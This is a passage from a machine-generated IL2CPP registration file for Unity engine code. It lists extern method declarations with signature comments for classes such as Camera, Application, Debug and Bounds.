extern void AnimationCurve__ctor_mEABC98C03805713354D61E50D9340766BD5B717E (void);
// 0x000000A2 System.Void UnityEngine.AnimationCurve::.ctor()
extern void AnimationCurve__ctor_m0D976567166F92383307DC8EB8D7082CD34E226F (void);
// 0x000000A3 System.Boolean UnityEngine.AnimationCurve::Equals(System.Object)
extern void AnimationCurve_Equals_mE47717A57755581C546986799C9DBC64D98928A9 (void);
// 0x000000A4 System.Boolean UnityEngine.AnimationCurve::Equals(UnityEngine.AnimationCurve)
extern void AnimationCurve_Equals_mC44657401804A22DCA648BD8495FC4E8A2F088A3 (void);
// 0x000000A5 System.Int32 UnityEngine.AnimationCurve::GetHashCode()
extern void AnimationCurve_GetHashCode_m1AEBC4C469357E1FA2541CC4B8D2B39C284CF8F6 (void);
// 0x000000A6 System.Void UnityEngine.AnimationCurve::GetKey_Injected(System.Int32,UnityEngine.Keyframe&)
extern void AnimationCurve_GetKey_Injected_mDE9640F589CB065C6872F3B61F27F2F759C83C0F (void);
// 0x000000A7 System.Boolean UnityEngine.Application::get_isPlaying()
extern void Application_get_isPlaying_m0B3B501E1093739F8887A0DAC5F61D9CB49CC337 (void);
// 0x000000A8 System.Boolean UnityEngine.Application::get_isFocused()
extern void Application_get_isFocused_m5E2835D701463AB393851163788F1F2DF3770E3E (void);
// 0x000000A9 System.Boolean UnityEngine.Application::get_isBatchMode()
extern void Application_get_isBatchMode_mBE1AD2AA536A0252E56EF19F72E3EA31A8733EE9 (void);
// 0x000000AA System.String UnityEngine.Application::get_dataPath()
extern void Application_get_dataPath_mBBC742FA17F8BD4156C4CB98480BEFBFB0BBB6D9 (void);
// 0x000000AB System.Void UnityEngine.Application::OpenURL(System.String)
extern void Application_OpenURL_m9F74228B576891156330C84B72218C08BEB9F564 (void);
// 0x000000AC System.Int32 UnityEngine.Application::get_targetFrameRate()
extern void Application_get_targetFrameRate_mB9877E89AFCF1CF0651D9471D5152490BF66BE5E (void);
// 0x000000AD System.Void UnityEngine.Application::set_targetFrameRate(System.Int32)
extern void Application_set_targetFrameRate_m794A13DC5116C506B042663606691257CF3A7325 (void);
// 0x000000AE UnityEngine.RuntimePlatform UnityEngine.Application::get_platform()
extern void Application_get_platform_m1AB34E71D9885B120F6021EB2B11DCB28CD6008D (void);
// 0x000000AF System.Void UnityEngine.Application::CallLowMemory()
extern void Application_CallLowMemory_mEDE4C1A091B81B3A96F2BC498EE8467D38A54D0E (void);
// 0x000000B0 System.Void UnityEngine.Application::CallLogCallback(System.String,System.String,UnityEngine.LogType,System.Boolean)
extern void Application_CallLogCallback_mAF3C44463FC74C427245D3C057D6C71F584D7FAD (void);
// 0x000000B1 System.Void UnityEngine.Application::add_onBeforeRender(UnityEngine.Events.UnityAction)
extern void Application_add_onBeforeRender_m10ABDBFFB06BEA4E016EDE6AFBAF474986DF03EE (void);
// 0x000000B2 System.Void UnityEngine.Application::remove_onBeforeRender(UnityEngine.Events.UnityAction)
extern void Application_remove_onBeforeRender_m8E7F9777E8D9C69269A69D2429B8C32A24A52597 (void);
// 0x000000B3 System.Void UnityEngine.Application::add_quitting(System.Action)
extern void Application_add_quitting_m0FEF9560C9CB99F40EEE8585455B4461101F70F4 (void);
// 0x000000B4 System.Void UnityEngine.Application::remove_quitting(System.Action)
extern void Application_remove_quitting_mC309C9BF095DF4D065340A2F47CC69FC6F7BEFB9 (void);
// 0x000000B5 System.Boolean UnityEngine.Application::Internal_ApplicationWantsToQuit()
extern void Application_Internal_ApplicationWantsToQuit_m5D925FE7AA2E59A1CCCA8783ECDFAFA43FD94EA9 (void);
// 0x000000B6 System.Void UnityEngine.Application::Internal_ApplicationQuit()
extern void Application_Internal_ApplicationQuit_m72090516F3E7794420B7D8F9A748F37ECE28CC33 (void);
// 0x000000B7 System.Void UnityEngine.Application::Internal_ApplicationUnload()
extern void Application_Internal_ApplicationUnload_m7809D21025D13B748A204471D021FDF14DE4CA4F (void);
// 0x000000B8 System.Void UnityEngine.Application::InvokeOnBeforeRender()
extern void Application_InvokeOnBeforeRender_m95B5893DA961B70E61B0C8A89DA121E48D9DFA5F (void);
// 0x000000B9 System.Void UnityEngine.Application::InvokeFocusChanged(System.Boolean)
extern void Application_InvokeFocusChanged_m7C803F5C1A2F5CCE59FBE0F03DE7FE254009650B (void);
// 0x000000BA System.Void UnityEngine.Application::InvokeDeepLinkActivated(System.String)
extern void Application_InvokeDeepLinkActivated_m8E9FC172650F96B9374AA13BF0F57488D340E008 (void);
// 0x000000BB System.Boolean UnityEngine.Application::get_isEditor()
extern void Application_get_isEditor_m0377DB707B566C8E21DA3CD99963210F6D57D234 (void);
// 0x000000BC System.Void UnityEngine.Application/LowMemoryCallback::.ctor(System.Object,System.IntPtr)
extern void LowMemoryCallback__ctor_m3B5E06F22A115B898C51A5C4B20166E2A92E0375 (void);
// 0x000000BD System.Void UnityEngine.Application/LowMemoryCallback::Invoke()
extern void LowMemoryCallback_Invoke_m3B2AE4EC5556D1D98237EF965477487AE4C7D708 (void);
// 0x000000BE System.Void UnityEngine.Application/LogCallback::.ctor(System.Object,System.IntPtr)
extern void LogCallback__ctor_m327A4C69691F8A4B01D405858E48B8A7D9D2A79D (void);
// 0x000000BF System.Void UnityEngine.Application/LogCallback::Invoke(System.String,System.String,UnityEngine.LogType)
extern void LogCallback_Invoke_m88EACBF170351AE6FC8E6F5154CD09179D67BB47 (void);
// 0x000000C0 UnityEngine.BootConfigData UnityEngine.BootConfigData::WrapBootConfigData(System.IntPtr)
extern void BootConfigData_WrapBootConfigData_m8A49BB7810C2869C7E043264CD7CC04226FB4E84 (void);
// 0x000000C1 System.Void UnityEngine.BootConfigData::.ctor(System.IntPtr)
extern void BootConfigData__ctor_m67B06923C40A5363192040A89BB92479B4B74A9A (void);
// 0x000000C2 System.Void UnityEngine.Camera::.ctor()
extern void Camera__ctor_m6D8568D99066C871656AC9A712A43D96A413BEBA (void);
// 0x000000C3 System.Single UnityEngine.Camera::get_nearClipPlane()
extern void Camera_get_nearClipPlane_m5E8FAF84326E3192CB036BD29DCCDAF6A9861013 (void);
// 0x000000C4 System.Void UnityEngine.Camera::set_nearClipPlane(System.Single)
extern void Camera_set_nearClipPlane_m78482B5E4E0CE4C195D9CE0332AA75B2D9CCDDF6 (void);
// 0x000000C5 System.Single UnityEngine.Camera::get_farClipPlane()
extern void Camera_get_farClipPlane_m1D7128B85B5DB866F75FBE8CEBA48335716B67BD (void);
// 0x000000C6 System.Void UnityEngine.Camera::set_farClipPlane(System.Single)
extern void Camera_set_farClipPlane_m84EF39B09573168734613481FD979BFF31C60139 (void);
// 0x000000C7 System.Single UnityEngine.Camera::get_fieldOfView()
extern void Camera_get_fieldOfView_m9A93F17BBF89F496AE231C21817AFD1C1E833FBB (void);
// 0x000000C8 System.Void UnityEngine.Camera::set_fieldOfView(System.Single)
extern void Camera_set_fieldOfView_m5AA9EED4D1603A1DEDBF883D9C42814B2BDEB777 (void);
// 0x000000C9 System.Single UnityEngine.Camera::get_orthographicSize()
extern void Camera_get_orthographicSize_m7950C5627086253E02992A43ADFE59039DB473F8 (void);
// 0x000000CA System.Void UnityEngine.Camera::set_orthographicSize(System.Single)
extern void Camera_set_orthographicSize_m76DD021032ACB3DDBD052B75EC66DCE3A7295A5C (void);
// 0x000000CB System.Boolean UnityEngine.Camera::get_orthographic()
extern void Camera_get_orthographic_m904DEFC76C54DA4E30C20A62A86D5D87B7D4DD8F (void);
// 0x000000CC System.Void UnityEngine.Camera::set_orthographic(System.Boolean)
extern void Camera_set_orthographic_m64915C0840A68E526830A69F1C40257206185020 (void);
// 0x000000CD System.Single UnityEngine.Camera::get_depth()
extern void Camera_get_depth_mDF67FFF8ED61750467DFC4C6D8F236850AD1BB1D (void);
// 0x000000CE System.Single UnityEngine.Camera::get_aspect()
extern void Camera_get_aspect_m48BF8820EA2D55BE0D154BC5546819FB65BE257D (void);
// 0x000000CF System.Int32 UnityEngine.Camera::get_cullingMask()
extern void Camera_get_cullingMask_m6F5AFF8FB522F876D99E839BF77D8F27F26A1EF8 (void);
// 0x000000D0 System.Int32 UnityEngine.Camera::get_eventMask()
extern void Camera_get_eventMask_mEBACB61FFA0C8AAF3495454BABA50EE70655290A (void);
// 0x000000D1 UnityEngine.CameraClearFlags UnityEngine.Camera::get_clearFlags()
extern void Camera_get_clearFlags_mA74F538C124B391EF03C46A50CA7FF7B505B7602 (void);
// 0x000000D2 System.Void UnityEngine.Camera::set_clearFlags(UnityEngine.CameraClearFlags)
extern void Camera_set_clearFlags_m66541D9CC43CBAA5FE7364A50D43CA5569FD4D93 (void);
// 0x000000D3 System.Boolean UnityEngine.Camera::get_usePhysicalProperties()
extern void Camera_get_usePhysicalProperties_mCE30837910BC617288B1481EEE3CAC7C79E43192 (void);
// 0x000000D4 System.Void UnityEngine.Camera::set_usePhysicalProperties(System.Boolean)
extern void Camera_set_usePhysicalProperties_m4F99CCEBD78D6EAB21B772E947B2C683AC475814 (void);
// 0x000000D5 UnityEngine.Vector2 UnityEngine.Camera::get_sensorSize()
extern void Camera_get_sensorSize_m9EEC10A868D29D7E84E6238A15B87EEC7EB40516 (void);
// 0x000000D6 System.Void UnityEngine.Camera::set_sensorSize(UnityEngine.Vector2)
extern void Camera_set_sensorSize_mF303BEAEB38FCBE5B5E21D2AFA06FC3DA7B50DC7 (void);
// 0x000000D7 UnityEngine.Vector2 UnityEngine.Camera::get_lensShift()
extern void Camera_get_lensShift_m2B434351405FD7712043E440885C4A68DB51F538 (void);
// 0x000000D8 System.Void UnityEngine.Camera::set_lensShift(UnityEngine.Vector2)
extern void Camera_set_lensShift_m645CA635E70D7C7EC26E821D6EF7817375BCBD8D (void);
// 0x000000D9 UnityEngine.Camera/GateFitMode UnityEngine.Camera::get_gateFit()
extern void Camera_get_gateFit_mEFDFD12C908B47F5AB0DED2BC4355EB59C948C12 (void);
// 0x000000DA System.Void UnityEngine.Camera::set_gateFit(UnityEngine.Camera/GateFitMode)
extern void Camera_set_gateFit_m010FFEDCE03AECD34A63F99A84B3FAAB3DC442E0 (void);
// 0x000000DB UnityEngine.Rect UnityEngine.Camera::get_pixelRect()
extern void Camera_get_pixelRect_m5F40F5C324EB252261F66962411EE08CC4BE39E7 (void);
// 0x000000DC UnityEngine.RenderTexture UnityEngine.Camera::get_targetTexture()
extern void Camera_get_targetTexture_mC856D7FF8351476068D04E245E4F08F5C56A55BD (void);
// 0x000000DD System.Int32 UnityEngine.Camera::get_targetDisplay()
extern void Camera_get_targetDisplay_m204A169C94EEABDB491FA5A77CC684146B10DF80 (void);
// 0x000000DE UnityEngine.Matrix4x4 UnityEngine.Camera::get_projectionMatrix()
extern void Camera_get_projectionMatrix_m9B943EFDD6418528A055321E14F75F1511DD9B4A (void);
// 0x000000DF System.Void UnityEngine.Camera::set_projectionMatrix(UnityEngine.Matrix4x4)
extern void Camera_set_projectionMatrix_m351820E6903139402FFFF40221B32D0C52B5A094 (void);
// 0x000000E0 System.Void UnityEngine.Camera::ResetProjectionMatrix()
extern void Camera_ResetProjectionMatrix_m6C5F82F7CA38E39DC357A1C53C7DD26791C27AFD (void);
// 0x000000E1 UnityEngine.Vector3 UnityEngine.Camera::WorldToScreenPoint(UnityEngine.Vector3,UnityEngine.Camera/MonoOrStereoscopicEye)
extern void Camera_WorldToScreenPoint_m6612AF37FFBBACC568877D4AA3AD5F11C76D9657 (void);
// 0x000000E2 UnityEngine.Vector3 UnityEngine.Camera::ScreenToWorldPoint(UnityEngine.Vector3,UnityEngine.Camera/MonoOrStereoscopicEye)
extern void Camera_ScreenToWorldPoint_m29847A50FC277447010B0D119A601E348BC9C215 (void);
// 0x000000E3 UnityEngine.Vector3 UnityEngine.Camera::WorldToScreenPoint(UnityEngine.Vector3)
extern void Camera_WorldToScreenPoint_m26B4C8945C3B5731F1CC5944CFD96BF17126BAA3 (void);
// 0x000000E4 UnityEngine.Vector3 UnityEngine.Camera::ScreenToWorldPoint(UnityEngine.Vector3)
extern void Camera_ScreenToWorldPoint_m5EA3148F070985EC72127AAC3448D8D6ABE6E7E5 (void);
// 0x000000E5 UnityEngine.Vector3 UnityEngine.Camera::ScreenToViewportPoint(UnityEngine.Vector3)
extern void Camera_ScreenToViewportPoint_m8907015773080F63D1034CEDEDEA4AF14FB2F3C5 (void);
// 0x000000E6 UnityEngine.Ray UnityEngine.Camera::ScreenPointToRay(UnityEngine.Vector2,UnityEngine.Camera/MonoOrStereoscopicEye)
extern void Camera_ScreenPointToRay_mA8EEC93B0731C859D2FF29D7DECFB806E3D9F0CC (void);
// 0x000000E7 UnityEngine.Ray UnityEngine.Camera::ScreenPointToRay(UnityEngine.Vector3,UnityEngine.Camera/MonoOrStereoscopicEye)
extern void Camera_ScreenPointToRay_mA27CE345E80542143237233D503A71392594AA9B (void);
// 0x000000E8 UnityEngine.Ray UnityEngine.Camera::ScreenPointToRay(UnityEngine.Vector3)
extern void Camera_ScreenPointToRay_m2887B9A49880B7AB670C57D66B67D6A6689FE315 (void);
// 0x000000E9 UnityEngine.Camera UnityEngine.Camera::get_main()
extern void Camera_get_main_mF222B707D3BF8CC9C7544609EFC71CFB62E81D43 (void);
// 0x000000EA UnityEngine.Camera UnityEngine.Camera::get_current()
extern void Camera_get_current_m6D76274A65CF75DD2AE6CAC2A1DDADB39C184C66 (void);
// 0x000000EB System.Boolean UnityEngine.Camera::get_stereoEnabled()
extern void Camera_get_stereoEnabled_m33F6247051D68E8FFEF9C0EC34C6F4B4B53FC8AF (void);
// 0x000000EC System.Int32 UnityEngine.Camera::GetAllCamerasCount()
extern void Camera_GetAllCamerasCount_m3ED056EA416E335E2D6ADA2E91D288F497D06989 (void);
// 0x000000ED System.Int32 UnityEngine.Camera::GetAllCamerasImpl(UnityEngine.Camera[])
extern void Camera_GetAllCamerasImpl_m0EE908E2366A4F573C2894E6D40D7887947B7251 (void);
// 0x000000EE System.Int32 UnityEngine.Camera::get_allCamerasCount()
extern void Camera_get_allCamerasCount_mC8FB514B97339BE01C79CA0B68169FC5B617191C (void);
// 0x000000EF System.Int32 UnityEngine.Camera::GetAllCameras(UnityEngine.Camera[])
extern void Camera_GetAllCameras_m6F7D929ADBED771F2EFAAF421B6E2026DF63126B (void);
// 0x000000F0 System.Void UnityEngine.Camera::AddCommandBufferImpl(UnityEngine.Rendering.CameraEvent,UnityEngine.Rendering.CommandBuffer)
extern void Camera_AddCommandBufferImpl_m3C533A19EE77CD32098C5E3F2B7A1ADF809DAFCE (void);
// 0x000000F1 System.Void UnityEngine.Camera::RemoveCommandBufferImpl(UnityEngine.Rendering.CameraEvent,UnityEngine.Rendering.CommandBuffer)
extern void Camera_RemoveCommandBufferImpl_mF9533F3C9C88200BF06C0C4969B6464E750145AD (void);
// 0x000000F2 System.Void UnityEngine.Camera::AddCommandBuffer(UnityEngine.Rendering.CameraEvent,UnityEngine.Rendering.CommandBuffer)
extern void Camera_AddCommandBuffer_m2C1C3C2D93CB62D569714B3FFA694CAB9BF81A9A (void);
// 0x000000F3 System.Void UnityEngine.Camera::RemoveCommandBuffer(UnityEngine.Rendering.CameraEvent,UnityEngine.Rendering.CommandBuffer)
extern void Camera_RemoveCommandBuffer_m7749BA282C14AA7E9E71A68E911F41D1B8429F11 (void);
// 0x000000F4 System.Void UnityEngine.Camera::FireOnPreCull(UnityEngine.Camera)
extern void Camera_FireOnPreCull_m92F718274D638F4AA9F30D4C919BDCC93A48F52D (void);
// 0x000000F5 System.Void UnityEngine.Camera::FireOnPreRender(UnityEngine.Camera)
extern void Camera_FireOnPreRender_mFE161C310D5A088C896590C983885C9D01BA34A1 (void);
// 0x000000F6 System.Void UnityEngine.Camera::FireOnPostRender(UnityEngine.Camera)
extern void Camera_FireOnPostRender_m75D9DF1EE0EB19B459AD0C96997D255D6EBD6A94 (void);
// 0x000000F7 System.Void UnityEngine.Camera::get_sensorSize_Injected(UnityEngine.Vector2&)
extern void Camera_get_sensorSize_Injected_m58F4E3216EBA9A36F3A719AFBE694A47D52E6293 (void);
// 0x000000F8 System.Void UnityEngine.Camera::set_sensorSize_Injected(UnityEngine.Vector2&)
extern void Camera_set_sensorSize_Injected_mD73656DF1BEA45C87DF8CCD53579A0D3D8406B04 (void);
// 0x000000F9 System.Void UnityEngine.Camera::get_lensShift_Injected(UnityEngine.Vector2&)
extern void Camera_get_lensShift_Injected_m8BBC825BC7DB6675F470F3E66F7F761A9BB7DB17 (void);
// 0x000000FA System.Void UnityEngine.Camera::set_lensShift_Injected(UnityEngine.Vector2&)
extern void Camera_set_lensShift_Injected_mBF611201EA4F3D024088083AE21BA1591AEC8989 (void);
// 0x000000FB System.Void UnityEngine.Camera::get_pixelRect_Injected(UnityEngine.Rect&)
extern void Camera_get_pixelRect_Injected_mA85B24A9EDBD279189D560BD46B611E69C8EEDA3 (void);
// 0x000000FC System.Void UnityEngine.Camera::get_projectionMatrix_Injected(UnityEngine.Matrix4x4&)
extern void Camera_get_projectionMatrix_Injected_m7AB1A44CC7DA6767CD29CDA56E6144929775B5F9 (void);
// 0x000000FD System.Void UnityEngine.Camera::set_projectionMatrix_Injected(UnityEngine.Matrix4x4&)
extern void Camera_set_projectionMatrix_Injected_mAE3FA8C6DD7C8EDCCD9665475F620A62FA926AF2 (void);
// 0x000000FE System.Void UnityEngine.Camera::WorldToScreenPoint_Injected(UnityEngine.Vector3&,UnityEngine.Camera/MonoOrStereoscopicEye,UnityEngine.Vector3&)
extern void Camera_WorldToScreenPoint_Injected_m3D83428A7AC8033EB4D357DF55BFA2ED652DEB64 (void);
// 0x000000FF System.Void UnityEngine.Camera::ScreenToWorldPoint_Injected(UnityEngine.Vector3&,UnityEngine.Camera/MonoOrStereoscopicEye,UnityEngine.Vector3&)
extern void Camera_ScreenToWorldPoint_Injected_m6647F532E4C7710768F6EB5BA507A0A696FC149F (void);
// 0x00000100 System.Void UnityEngine.Camera::ScreenToViewportPoint_Injected(UnityEngine.Vector3&,UnityEngine.Vector3&)
extern void Camera_ScreenToViewportPoint_Injected_m08D0DAE62A0BAF0443871DAF87FE4B3F18CC45C2 (void);
// 0x00000101 System.Void UnityEngine.Camera::ScreenPointToRay_Injected(UnityEngine.Vector2&,UnityEngine.Camera/MonoOrStereoscopicEye,UnityEngine.Ray&)
extern void Camera_ScreenPointToRay_Injected_m9B7E1A86A79D7578D03345360E86AED3C8D09C59 (void);
// 0x00000102 System.Void UnityEngine.Camera/CameraCallback::.ctor(System.Object,System.IntPtr)
extern void CameraCallback__ctor_mB48D13F30E749B551E4692E4F2D762C375F62B41 (void);
// 0x00000103 System.Void UnityEngine.Camera/CameraCallback::Invoke(UnityEngine.Camera)
extern void CameraCallback_Invoke_m67E54F44AA3C83F0D9EF47A5FBC6AF43B0B26362 (void);
// 0x00000104 System.Void UnityEngine.BoundingSphere::.ctor(UnityEngine.Vector3,System.Single)
extern void BoundingSphere__ctor_mB76812ECBDD8BA5B3E246871C58F6FA6CA2061C7 (void);
// 0x00000105 System.Void UnityEngine.CullingGroup::SendEvents(UnityEngine.CullingGroup,System.IntPtr,System.Int32)
extern void CullingGroup_SendEvents_m1A2EBF07AAD9556C847CF52C36A0F88E466CE4B8 (void);
// 0x00000106 System.Void UnityEngine.CullingGroup/StateChanged::.ctor(System.Object,System.IntPtr)
extern void StateChanged__ctor_m1D704B739C7C0F0D91873D24D10A92942826F0C9 (void);
// 0x00000107 System.Void UnityEngine.CullingGroup/StateChanged::Invoke(UnityEngine.CullingGroupEvent)
extern void StateChanged_Invoke_m050DE641598E0C558A8CC865EAD679194581182C (void);
// 0x00000108 UnityEngine.Vector3 UnityEngine.ReflectionProbe::get_size()
extern void ReflectionProbe_get_size_m1CABA0F90893A89F168D417083F013376F8365D5 (void);
// 0x00000109 System.Void UnityEngine.ReflectionProbe::set_size(UnityEngine.Vector3)
extern void ReflectionProbe_set_size_m901ED70592B51139B62209031BD8C7377FB85BBB (void);
// 0x0000010A System.Void UnityEngine.ReflectionProbe::set_center(UnityEngine.Vector3)
extern void ReflectionProbe_set_center_m83F570812344A9C08156023C49405F080DA4D8FA (void);
// 0x0000010B System.Void UnityEngine.ReflectionProbe::set_boxProjection(System.Boolean)
extern void ReflectionProbe_set_boxProjection_m419731665FD0ACD069C32AD25F4631B729D8A0B7 (void);
// 0x0000010C System.Void UnityEngine.ReflectionProbe::set_mode(UnityEngine.Rendering.ReflectionProbeMode)
extern void ReflectionProbe_set_mode_m61AFCA93A8B5F5DF636006428D9F902F4F4E63B4 (void);
// 0x0000010D UnityEngine.Texture UnityEngine.ReflectionProbe::get_customBakedTexture()
extern void ReflectionProbe_get_customBakedTexture_m991E0EF31DE68C86F00D821ADAA8A9663F73FDB7 (void);
// 0x0000010E System.Void UnityEngine.ReflectionProbe::set_customBakedTexture(UnityEngine.Texture)
extern void ReflectionProbe_set_customBakedTexture_m0DAEAFF41F7992D5646CE5C0EE1E906F718179DE (void);
// 0x0000010F System.Void UnityEngine.ReflectionProbe::CallReflectionProbeEvent(UnityEngine.ReflectionProbe,UnityEngine.ReflectionProbe/ReflectionProbeEvent)
extern void ReflectionProbe_CallReflectionProbeEvent_m6C0D7A58B981F45146A55300A76D943C4DC9B1C8 (void);
// 0x00000110 System.Void UnityEngine.ReflectionProbe::CallSetDefaultReflection(UnityEngine.Texture)
extern void ReflectionProbe_CallSetDefaultReflection_mCEA9C6A516B81FCC668EA675D406FEA506F2ED30 (void);
// 0x00000111 System.Void UnityEngine.ReflectionProbe::get_size_Injected(UnityEngine.Vector3&)
extern void ReflectionProbe_get_size_Injected_mE56ED26CAD1E61ACDF09A1DA6FDCE35BC0067D01 (void);
// 0x00000112 System.Void UnityEngine.ReflectionProbe::set_size_Injected(UnityEngine.Vector3&)
extern void ReflectionProbe_set_size_Injected_m491149669865BF07B5F75302A48BAF3CCAD24235 (void);
// 0x00000113 System.Void UnityEngine.ReflectionProbe::set_center_Injected(UnityEngine.Vector3&)
extern void ReflectionProbe_set_center_Injected_mFA4555870272FAB3EF30F1F12D2BC342A2B8EAA7 (void);
// 0x00000114 System.Void UnityEngine.DebugLogHandler::Internal_Log(UnityEngine.LogType,UnityEngine.LogOption,System.String,UnityEngine.Object)
extern void DebugLogHandler_Internal_Log_mCDF82FF0477166C9DDB0ECEDB48EE4BCBBDB4F79 (void);
// 0x00000115 System.Void UnityEngine.DebugLogHandler::Internal_LogException(System.Exception,UnityEngine.Object)
extern void DebugLogHandler_Internal_LogException_mE01E7F56C7441415DDACFFFAC2C4E6FE15B76DB5 (void);
// 0x00000116 System.Void UnityEngine.DebugLogHandler::LogFormat(UnityEngine.LogType,UnityEngine.Object,System.String,System.Object[])
extern void DebugLogHandler_LogFormat_m216B169EF9B669F2ED4C59F6B9F326D4EBBDF821 (void);
// 0x00000117 System.Void UnityEngine.DebugLogHandler::LogException(System.Exception,UnityEngine.Object)
extern void DebugLogHandler_LogException_mF66A663A86BF5D412BC9A4B3F92DA5CF61049F08 (void);
// 0x00000118 System.Void UnityEngine.DebugLogHandler::.ctor()
extern void DebugLogHandler__ctor_m1078DDBE735090C0215BFDF2409A376F10F7A070 (void);
// 0x00000119 UnityEngine.ILogger UnityEngine.Debug::get_unityLogger()
extern void Debug_get_unityLogger_mA872400E9E585FCD6A2DE1717748A458545DE8A4 (void);
// 0x0000011A System.Int32 UnityEngine.Debug::ExtractStackTraceNoAlloc(System.Byte*,System.Int32,System.String)
extern void Debug_ExtractStackTraceNoAlloc_m34102CFB9E68FE7B468574F30C6E2D508CF91704 (void);
// 0x0000011B System.Void UnityEngine.Debug::Log(System.Object)
extern void Debug_Log_m86567BCF22BBE7809747817453CACA0E41E68219 (void);
// 0x0000011C System.Void UnityEngine.Debug::Log(System.Object,UnityEngine.Object)
extern void Debug_Log_m825387C0A72F1965797D56C1F8AB0D6678F3F9BE (void);
// 0x0000011D System.Void UnityEngine.Debug::LogError(System.Object)
extern void Debug_LogError_m059825802BB6AF7EA9693FEBEEB0D85F59A3E38E (void);
// 0x0000011E System.Void UnityEngine.Debug::LogError(System.Object,UnityEngine.Object)
extern void Debug_LogError_m385F8F46AD9C455E80053F42571A7CE321915C0A (void);
// 0x0000011F System.Void UnityEngine.Debug::LogErrorFormat(System.String,System.Object[])
extern void Debug_LogErrorFormat_mA33C95EF832A60D72A7EE26074E13A86BE7E30C6 (void);
// 0x00000120 System.Void UnityEngine.Debug::LogErrorFormat(UnityEngine.Object,System.String,System.Object[])
extern void Debug_LogErrorFormat_mB54A08E41171EF537253C2B5170EFB922FF4635A (void);
// 0x00000121 System.Void UnityEngine.Debug::LogException(System.Exception)
extern void Debug_LogException_m82E44FEC6B03BC34AFC2CAF6583051570C60CB9E (void);
// 0x00000122 System.Void UnityEngine.Debug::LogException(System.Exception,UnityEngine.Object)
extern void Debug_LogException_m6A7A404239B24E1C7CA358508923F47ABDF40D05 (void);
// 0x00000123 System.Void UnityEngine.Debug::LogWarning(System.Object)
extern void Debug_LogWarning_mEF15C6B17CE4E1FA7E379CDB82CE40FCD89A3F28 (void);
// 0x00000124 System.Void UnityEngine.Debug::LogWarning(System.Object,UnityEngine.Object)
extern void Debug_LogWarning_m5C8299150E64600CBF5C92706AD610C21D0C0DC5 (void);
// 0x00000125 System.Void UnityEngine.Debug::LogWarningFormat(System.String,System.Object[])
extern void Debug_LogWarningFormat_m0D4A31935564D0FA042103C1231DBBD2ED0BC20A (void);
// 0x00000126 System.Void UnityEngine.Debug::LogWarningFormat(UnityEngine.Object,System.String,System.Object[])
extern void Debug_LogWarningFormat_m81731988A7BE74CCEFDEB0000C65C4DEED5CA8AE (void);
// 0x00000127 System.Void UnityEngine.Debug::Assert(System.Boolean)
extern void Debug_Assert_mC95931BE797761A2D7800908C0BA4B41D68B3216 (void);
// 0x00000128 System.Void UnityEngine.Debug::Assert(System.Boolean,System.String)
extern void Debug_Assert_m9CA35857A4FF29506840C572F2C7BA233805B806 (void);
// 0x00000129 System.Void UnityEngine.Debug::LogAssertion(System.Object)
extern void Debug_LogAssertion_mC3BDB863CDF67D35AA001E42105DC4925FB028F4 (void);
// 0x0000012A System.Void UnityEngine.Debug::LogAssertionFormat(System.String,System.Object[])
extern void Debug_LogAssertionFormat_mE45B449CC92F29E605AF8CD01123F5A10C2C4B00 (void);
// 0x0000012B System.Boolean UnityEngine.Debug::CallOverridenDebugHandler(System.Exception,UnityEngine.Object)
extern void Debug_CallOverridenDebugHandler_mDD875B192C7AB5D58590029EC5510FECD621590B (void);
// 0x0000012C System.Boolean UnityEngine.Debug::IsLoggingEnabled()
extern void Debug_IsLoggingEnabled_m0A0E57CCECE356C1468EAF53FE9EF19EBFF1BCD1 (void);
// 0x0000012D System.Void UnityEngine.Debug::.cctor()
extern void Debug__cctor_m367B08F18665FE9E6E959914F170DD5E6BF0AC2C (void);
// 0x0000012E T UnityEngine.ExposedReference`1::Resolve(UnityEngine.IExposedPropertyTable)
// 0x0000012F UnityEngine.Object UnityEngine.IExposedPropertyTable::GetReferenceValue(UnityEngine.PropertyName,System.Boolean&)
// 0x00000130 System.Void UnityEngine.Bounds::.ctor(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Bounds__ctor_mAF7B238B9FBF90C495E5D7951760085A93119C5A (void);
// 0x00000131 System.Int32 UnityEngine.Bounds::GetHashCode()
extern void Bounds_GetHashCode_m59C79B529D33866FE45FEFC0C69FBD3B4AC7E172 (void);
// 0x00000132 System.Boolean UnityEngine.Bounds::Equals(System.Object)
extern void Bounds_Equals_m93E0B9D24C73E57A6FABB9D312101D48183C88CC (void);
// 0x00000133 System.Boolean UnityEngine.Bounds::Equals(UnityEngine.Bounds)
extern void Bounds_Equals_m615135524315743D29633C33B6C8B16B754266DB (void);
// 0x00000134 UnityEngine.Vector3 UnityEngine.Bounds::get_center()
extern void Bounds_get_center_m5B05F81CB835EB6DD8628FDA24B638F477984DC3 (void);
// 0x00000135 System.Void UnityEngine.Bounds::set_center(UnityEngine.Vector3)
extern void Bounds_set_center_m891869DD5B1BEEE2D17907BBFB7EB79AAE44884B (void);
// 0x00000136 UnityEngine.Vector3 UnityEngine.Bounds::get_size()
extern void Bounds_get_size_m0699A53A55A78B3201D7270D6F338DFA91B6FAD4 (void);
// 0x00000137 System.Void UnityEngine.Bounds::set_size(UnityEngine.Vector3)
extern void Bounds_set_size_m950CFB68CDD1BF409E770509A38B958E1AE68128 (void);
// 0x00000138 UnityEngine.Vector3 UnityEngine.Bounds::get_extents()
extern void Bounds_get_extents_mFE6DC407FCE2341BE2C750CB554055D211281D25 (void);
// 0x00000139 System.Void UnityEngine.Bounds::set_extents(UnityEngine.Vector3)
extern void Bounds_set_extents_m09496358547B86A93EFE7BE6371E7A6FE937C46F (void);
// 0x0000013A UnityEngine.Vector3 UnityEngine.Bounds::get_min()
extern void Bounds_get_min_m465AC9BBE1DE5D8E8AD95AC19B9899068FEEBB13 (void);
// 0x0000013B UnityEngine.Vector3 UnityEngine.Bounds::get_max()
extern void Bounds_get_max_m6446F2AB97C1E57CA89467B9DE52D4EB61F1CB09 (void);
// 0x0000013C System.Boolean UnityEngine.Bounds::op_Equality(UnityEngine.Bounds,UnityEngine.Bounds)
extern void Bounds_op_Equality_m8DFE70F630E5BB54FC9E14814F2A3991F2468510 (void);
// 0x0000013D System.Boolean UnityEngine.Bounds::op_Inequality(UnityEngine.Bounds,UnityEngine.Bounds)
extern void Bounds_op_Inequality_mCA10789889154806602C77822FA041863EBE4147 (void);
// 0x0000013E System.Void UnityEngine.Bounds::SetMinMax(UnityEngine.Vector3,UnityEngine.Vector3)
extern void Bounds_SetMinMax_mB5F7DDF18EDB7F3F25FA6D2B36824F28978C540F (void);
// 0x0000013F System.Void UnityEngine.Bounds::Encapsulate(UnityEngine.Vector3)
